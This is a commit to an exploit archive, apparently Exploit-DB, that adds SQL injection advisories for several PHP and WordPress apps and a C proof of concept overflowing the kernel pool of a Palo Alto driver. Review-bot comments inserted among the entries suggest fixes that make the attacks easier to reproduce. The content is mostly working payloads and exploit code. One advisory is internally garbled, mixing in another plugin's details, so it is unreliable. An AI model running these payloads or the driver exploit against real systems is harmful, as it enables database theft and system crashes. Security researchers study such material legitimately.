DB: 2017-01-28

6 new exploits

Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow
My Photo Gallery 1.0 - SQL Injection
Maian Weblog 4.0 - SQL Injection
WordPress Plugin WP Private Messages 1.0.1 - SQL Injection
Online Hotel Booking System Pro 1.2 - SQL Injection
WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection
This commit is contained in:
Offensive Security 2017-01-28 05:01:17 +00:00
parent d0b74905e8
commit 2b017ecadf
7 changed files with 278 additions and 0 deletions


@ -8771,6 +8771,7 @@ id,file,description,date,author,platform,type,port
41158,platforms/linux/local/41158.txt,"Man-db 2.6.7.1 - Privilege Escalation (PoC)",2015-12-02,halfdog,linux,local,0
41171,platforms/linux/local/41171.txt,"Systemd 228 - Privilege Escalation (PoC)",2017-01-24,"Sebastian Krahmer",linux,local,0
41173,platforms/linux/local/41173.c,"OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalation",2017-01-26,"Federico Bento",linux,local,0
41176,platforms/windows/local/41176.c,"Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow",2017-01-26,"Parvez Anwar",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -37108,3 +37109,8 @@ id,file,description,date,author,platform,type,port
41170,platforms/hardware/webapps/41170.txt,"TM RG4332 Wireless Router - Arbitrary File Disclosure",2017-01-26,"Saeid Atabaki",hardware,webapps,0
41172,platforms/php/webapps/41172.txt,"PHPBack < 1.3.1 - SQL Injection / Cross-Site Scripting",2017-01-26,"Manish Tanwar",php,webapps,0
41175,platforms/hardware/webapps/41175.txt,"Polycom VVX Web Interface - Change Admin Password",2017-01-26,"Mike Brown",hardware,webapps,0
41177,platforms/php/webapps/41177.txt,"My Photo Gallery 1.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0
41178,platforms/php/webapps/41178.txt,"Maian Weblog 4.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0
41180,platforms/php/webapps/41180.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2017-01-27,"Lenon Leite",php,webapps,0
41181,platforms/php/webapps/41181.txt,"Online Hotel Booking System Pro 1.2 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
41182,platforms/php/webapps/41182.txt,"WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0


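--- /dev/null
+++ b/platforms/php/webapps/41177.txt
@@ -0,0 +1,30 @@
+Introduction
+Exploit Title: My Photo Gallery SQL Injection
+Date: 27.01.2017
+Vendor Homepage: http://software.friendsinwar.com/
+Software Link: http://software.friendsinwar.com/news.php?readmore=40
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+Overview
+My Photo Gallery is a free is a user-friendly picture gallery script.
+Users can register and upload their images to the site. A moderator can see the images and validate, edit or delete them.
+The script comes with a very user friendly admin system where you can change and add many things such as: Categories, Images, Edit members, site looks and many more.
+Type of vulnerability:
+An SQL Injection vulnerability in My Photo Gallery allows attackers to read
+arbitrary administrator data from the database.
+Vulnerable Url:
+http://locahost/my_photo_gallery/image.php?imgid=[payload]
+Vulnerable parameter : imgid
+Mehod : GET
+Payload:
+imgid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170767a71,0x6652547066744842666d70594d52797173706a516f6c496f4d4b6b646f774d624a614f52676e6372,0x716b766b71)--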
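Review bot: The `Vulnerable Url` line reads `http://locahost/...`, a typo for `localhost` that makes a copy-pasted reproduction fail before it reaches the target; it should be `http://localhost/my_photo_gallery/image.php?imgid=[payload]`. The payload is a five-column UNION that echoes a marker assembled from hex literals (`0x7170767a71` and `0x716b766b71` are the strings `qpvzq` and `qkvkq`), but the advisory never says what a tester should look for in the response or whether `image.php` is reachable without a login, so the claim of reading "administrator data" is not verifiable as written; a line such as `Expected result: response body contains qpvzq...qkvkq; authentication: none required (confirm)` would close that gap. The column count of five is asserted only by the payload and should be stated as confirmed (e.g. via ORDER BY) rather than left implicit.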

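--- /dev/null
+++ b/platforms/php/webapps/41178.txt
@@ -0,0 +1,26 @@
+Introduction
+Exploit Title: Maian Weblog SQL Injection
+Date: 27.01.2017
+Vendor Homepage: http://www.maianweblog.com/
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+Overview
+Simple blog system for your website, Easily add/edit or delete blogs, Allow visitor comments for individual blogs, Optional e-mail notification for webmaster if comments are posted, Edit or delete visitor comments, BB Code, Calendar so visitors can view past archives, Support for multi language files, Show latest blogs/comments on blog page, Uses the Savant template engine.
+Type of vulnerability:
+An SQL Injection vulnerability in Maian Weblog allows attackers to read
+arbitrary data from the database.
+Vulnerable Url:
+http://locahost/weblog/blog/2[payload]/second-blog.html
+Mehod : GET
+Simple Payload:
+blog/2' AND (SELECT 2995 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(2995=2995,1))),0x717a787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'AUvx'='AUvx/q-blog.html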
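Review bot: The `Vulnerable Url` line (`.../weblog/blog/2[payload]/second-blog.html`) and the `Simple Payload` line (`blog/2' ... 'AUvx'='AUvx/q-blog.html`) disagree on the trailing slug (`second-blog.html` vs `q-blog.html`) and on whether `blog/` is part of the payload, so a reader cannot tell which string is substituted where; one consistent form, e.g. `http://localhost/weblog/blog/2' AND (...) AND 'AUvx'='AUvx/second-blog.html`, should be given. The host is also misspelled `locahost`. The payload is an error-based probe (the `FLOOR(RAND(0)*2)`/`GROUP BY` duplicate-key technique) whose `ELT(2995=2995,1)` only proves the injection point when the application echoes the MySQL error, yet the advisory claims arbitrary data can be read and never states the observable; add the expected response, which for these hex markers would be a `Duplicate entry 'qqzjq1qzxvq1'` error in the page. It would also help to say that the id is taken from the rewritten URL path rather than a query parameter, since that determines which rewrite/WAF layer sees the injected quote.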

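--- /dev/null
+++ b/platforms/php/webapps/41180.txt
@@ -0,0 +1,38 @@
+# Exploit Title: WP Private Messages 1.0.1 Plugin WordPress Sql Injection
+# Exploit Author: Lenon Leite
+# Vendor Homepage: https://wordpress.org/plugins/wp-email-users/
+# Software Link: https://wordpress.org/plugins/wp-email-users/
+# Contact: http://twitter.com/lenonleite
+# Website: http://lenonleite.com.br/
+# Category: webapps
+# Version: 1.3.1
+# Tested on: Ubuntu 14.04
+1 - Description:
+Type user access: is accessible for any registered user
+$_REQUEST[edit] is escaped wrong. Attack with Sql Injection
+http://lenonleite.com.br/blog/2017/01/17/english-wp-email-users-1-4-1-plugin-wordpress-sql-injection/
+2 - Proof of Concept:
+1 Login as regular user (created using wp-login.php?action=register):
+2 Using:
+<form action="http://localhost:8080/wp-admin/admin-ajax.php" method="post">
+<input type="text" name="action" value="weu_my_action">
+<input type="text" name="filetitle" value="0 UNION SELECT
+CONCAT(name,char(58),slug) FROM wp_terms WHERE term_id=1">
+<input type="text" name="temp_sel_key" value="select_temp">
+<input type="submit" name="">
+</form>
+3 - Timeline:
+- 12/01/2016 Discovered
+- 13/12/2016 Vendor not finded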
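Review bot: The body of this advisory does not match its title: the title names WP Private Messages 1.0.1, but `Vendor Homepage` and `Software Link` point to `wp-email-users`, `Version` says 1.3.1, the reference link is the author's wp-email-users 1.4.1 write-up, and the PoC posts `action=weu_my_action` with `filetitle`/`temp_sel_key` fields that appear to belong to that other plugin's `admin-ajax.php` handler, so the wrong product seems to have been copied in. The description names `$_REQUEST[edit]` as the badly escaped parameter while the form injects through `filetitle`, so the sink is misidentified as well. The timeline (`12/01/2016 Discovered`, `13/12/2016 Vendor not finded`) is either out of order or mixes two date formats. As submitted the entry cannot be used to confirm which plugin, version and parameter are actually vulnerable; the header lines should be corrected to the plugin the PoC targets, or the PoC replaced with one for WP Private Messages.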

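--- /dev/null
+++ b/platforms/php/webapps/41181.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Online Hotel Booking System Pro v1.2 - SQL Injection
+# Google Dork: N/A
+# Date: 27.01.2017
+# Vendor Homepage: http://www.bestsoftinc.com/
+# Software Buy: https://codecanyon.net/item/online-hotel-booking-system-pro/4606514
+# Demo: http://envato.bestsoftinc.net/hotel-booking-pro/
+# Version: 1.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/roomtype-details.php?tid=[SQL]
+# E.t.c
+# # # # #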
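Review bot: The only technical content is `roomtype-details.php?tid=[SQL]` followed by `E.t.c`, with no payload, no expected response and no statement of whether the page is reachable without authentication, so the finding is neither reproducible nor verifiable as submitted. At minimum give one concrete value for `tid` and the observable it produces (a database error, a measurable delay, or an echoed marker), plus the context in which the request was made (logged out, or as which role). If `E.t.c` means other parameters or scripts are injectable too, name them, since a fix that parameterizes only `tid` would otherwise leave them open. The `Demo` URL is a third party's live system and should not be presented as a test target.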

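--- /dev/null
+++ b/platforms/php/webapps/41182.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Online Hotel Booking System Pro v1.0 (WordPress Plugin) - SQL Injection
+# Google Dork: N/A
+# Date: 27.01.2017
+# Vendor Homepage: http://www.bestsoftinc.com/
+# Software Buy: https://codecanyon.net/item/online-hotel-booking-system-pro-wordpress-plugin/9338914
+# Demo: http://envato.bestsoftinc.net/wp-hotel-pro/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PLUGIN_PATH]/front/roomtype-details.php?tid=[SQL]
+# E.t.c
+# # # # #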
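Review bot: The request is to `[PLUGIN_PATH]/front/roomtype-details.php`, i.e. a plugin file addressed directly rather than through WordPress's `admin-ajax.php` or REST routing; if that is accurate it means the script runs outside WordPress's nonce and capability checks and is reachable by anyone who can hit the web server, which is the most important fact for triage and should be stated explicitly rather than left for the reader to infer. As with the standalone-product entry, no payload for `tid` and no expected response are given, so the finding cannot be reproduced or verified from the text; supply one concrete probe and what it returns, and expand `E.t.c` into the actual list of other injectable parameters or scripts if there are any. The `Demo` URL belongs to a third party and should not be used as the test target.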

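--- /dev/null
+++ b/platforms/windows/local/41176.c
@@ -0,0 +1,141 @@
+/*
+Exploit Title - Palo Alto Networks Terminal Services Agent Integer Overflow
+Date - 26th January 2017
+Discovered by - Parvez Anwar (@parvezghh)
+Vendor Homepage - https://www.paloaltonetworks.com/
+Tested Version - 7.0.3-13
+Driver Version - 6.0.7.0 - panta.sys
+Tested on OS - 32bit Windows 7 SP1
+CVE ID - CVE-2017-5329
+Vendor fix url - https://securityadvisories.paloaltonetworks.com/
+https://securityadvisories.paloaltonetworks.com/Home/Detail/71
+Fixed Version - 7.0.7 and later
+Fixed driver ver - 6.0.8.0
+Disassembly
+-----------
+.text:9A26F0BD loc_9A26F0BD:
+.text:9A26F0BD mov ecx, DeviceObject
+.text:9A26F0C3 mov dword ptr [ecx+1ACh], 0
+.text:9A26F0CD mov edx, DeviceObject
+.text:9A26F0D3 mov eax, [edx+1B8h] ; eax points to our inputted buffer
+.text:9A26F0D9 mov ecx, [eax+14h] ; Takes size to allocate from our inputted buffer 0x04924925
+.text:9A26F0DC imul ecx, 38h ; 0x38 * 0x04924925 = 0x100000018. Wraps round becoming size to allocate 0x18 (Integer Overflow)
+.text:9A26F0DF mov [ebp+NumberOfBytes], ecx ; Copy ecx value 0x18 onto stack
+.text:9A26F0E2 push 44415450h ; Tag (PTAD string used)
+.text:9A26F0E7 mov edx, [ebp+NumberOfBytes] ; Copy size 0x18 to edx
+.text:9A26F0EA push edx ; NumberOfBytes
+.text:9A26F0EB push 0 ; PoolType
+.text:9A26F0ED call ds:ExAllocatePoolWithTag ; If returned null (eax) exits with error cleanly else takes crash path
+.text:9A26F0F3 mov ecx, DeviceObject
+.text:9A26F0F9 mov [ecx+1B0h], eax
+.text:9A26F0FF mov edx, DeviceObject
+.text:9A26F105 cmp dword ptr [edx+1B0h], 0 ; Checks return value. If not null then jumps to our crash path
+.text:9A26F10C jnz short loc_9A26F13C ; Exits with error cleanly if incorrect size value but not crashable value
+.text:9A26F13C
+.text:9A26F13C loc_9A26F13C:
+.text:9A26F13C mov ecx, [ebp+NumberOfBytes]
+.text:9A26F13F push ecx ; 0x18 our allocated pool memory
+.text:9A26F140 push 0 ; int, sets allocated memory to 0x00
+.text:9A26F142 mov edx, DeviceObject
+.text:9A26F148 mov eax, [edx+1B0h]
+.text:9A26F14E push eax ; Pointer to our allocated buffer
+.text:9A26F14F call memset
+.text:9A26F154 add esp, 0Ch
+.text:9A26F157 mov [ebp+var_4], 0 ; Null out ebp-4
+.text:9A26F15E jmp short loc_9A26F169
+.text:9A26F160 loc_9A26F160:
+.text:9A26F160 mov ecx, [ebp+var_4]
+.text:9A26F163 add ecx, 1 ; Increment counter
+.text:9A26F166 mov [ebp+var_4], ecx ; Store counter value
+.text:9A26F169 loc_9A26F169:
+.text:9A26F169 mov edx, DeviceObject
+.text:9A26F16F mov eax, [edx+1B8h] ; eax points to our inputted buffer
+.text:9A26F175 mov ecx, [ebp+var_4] ; Loop counter number
+.text:9A26F178 cmp ecx, [eax+14h] ; Compares our inputted buffer size 0x04924925. Here our
+; size is not using the wrapped value so loops till BSOD
+.text:9A26F17B jnb short loc_9A26F19A
+.text:9A26F17D mov edx, [ebp+var_4] ; Counter value
+.text:9A26F180 imul edx, 38h
+.text:9A26F183 mov eax, DeviceObject
+.text:9A26F188 mov ecx, [eax+1B0h] ; Pointer to allocated pool copied to ecx
+.text:9A26F18E lea edx, [ecx+edx+30h] ; pointer+size(0x38*edx)+0x30
+.text:9A26F192 push edx
+.text:9A26F193 call sub_9A26C000 ; Starts overwriting other pool allocations !!!
+.text:9A26F198 jmp short loc_9A26F160
+.text:9A26C000 sub_9A26C000 proc near
+.text:9A26C000
+.text:9A26C000
+.text:9A26C000 arg_0 = dword ptr 8
+.text:9A26C000
+.text:9A26C000 push ebp
+.text:9A26C001 mov ebp, esp
+.text:9A26C003 mov eax, [ebp+arg_0] ; Copy allocated buffer pointer (pointer+size(0x38*edx)+0x30) to eax
+.text:9A26C006 mov ecx, [ebp+arg_0] ; Copy allocated buffer pointer (pointer+size(0x38*edx)+0x30) to ecx
+.text:9A26C009 mov [eax+4], ecx ; Store pointer in allocated buffer at pointer+size(0x38*edx)+0x30+4
+.text:9A26C00C mov edx, [ebp+arg_0] ; Copy allocated buffer pointer+size(0x38*edx)+0x30 to edx
+.text:9A26C00F mov eax, [ebp+arg_0] ; Copy allocated buffer pointer+size(0x38*edx)+0x30 to eax
+.text:9A26C012 mov [edx], eax ; Store pointer in allocated buffer at pointer+size(0x38*edx)+0x30
+.text:9A26C014 pop ebp
+.text:9A26C015 retn 4
+.text:9A26C015 sub_9A26C000 endp
+*/
+#include <stdio.h>
+#include <windows.h>
+#define BUFSIZE 44
+int main(int argc, char *argv[])
+{
+HANDLE hDevice;
+char devhandle[MAX_PATH];
+DWORD dwRetBytes = 0;
+unsigned char buffer[BUFSIZE];
+memset(buffer, 0x41, BUFSIZE);
+printf("\n[i] Size of total input buffer %d bytes", BUFSIZE);
+*(DWORD*)(buffer + 20) = 0x04924925;
+sprintf(devhandle, "\\\\.\\%s", "panta");
+hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
+if(hDevice == INVALID_HANDLE_VALUE)
+{
+printf("\n[-] Failed to open device %s\n\n", devhandle);
+return -1;
+}
+else
+{
+printf("\n[+] Open %s device successful", devhandle);
+}
+printf("\n[~] Press any key to continue . . .");
+getch();
+DeviceIoControl(hDevice, 0x88002200, buffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);
+printf("\n");
+CloseHandle(hDevice);
+return 0;
+}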
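Review bot: The `DeviceIoControl` call near the end of `main` discards its return value, so against a driver that rejects the bad size (the header says 6.0.8.0 "exits cleanly" on that path) the program prints nothing and a tester cannot tell "patched" from "IOCTL never reached"; capture the BOOL and report `GetLastError()` on failure, and say explicitly that a successful return without a crash is the expected result on a fixed driver. `getch()` is called without `#include <conio.h>`, which only builds through an implicit declaration; add the include (or switch to `_getch()`). The IOCTL `0x88002200` decodes to METHOD_BUFFERED with FILE_ANY_ACCESS, so the crash path is reachable by any caller the device's DACL lets open `\\.\panta`, which the PoC does not establish (it is not shown running as a standard user) and the header should state; the code as written demonstrates a kernel pool overwrite ending in a BSOD, not code execution, and that scope should be spelled out next to the CVE. The `sprintf` into `devhandle` is bounded by the constant `"panta"` but `snprintf(devhandle, sizeof devhandle, "\\\\.\\%s", "panta")` would keep it safe if the name is ever parameterized.
```c
/* … unchanged: banner, CreateFile, getch() … */
if (!DeviceIoControl(hDevice, 0x88002200, buffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL))
{
    /* a patched driver rejects the oversized element count and returns an error here */
    printf("\n[-] DeviceIoControl failed, GetLastError() = %lu", GetLastError());
}
else
{
    printf("\n[!] DeviceIoControl returned without a crash; driver may be patched");
}
printf("\n");
```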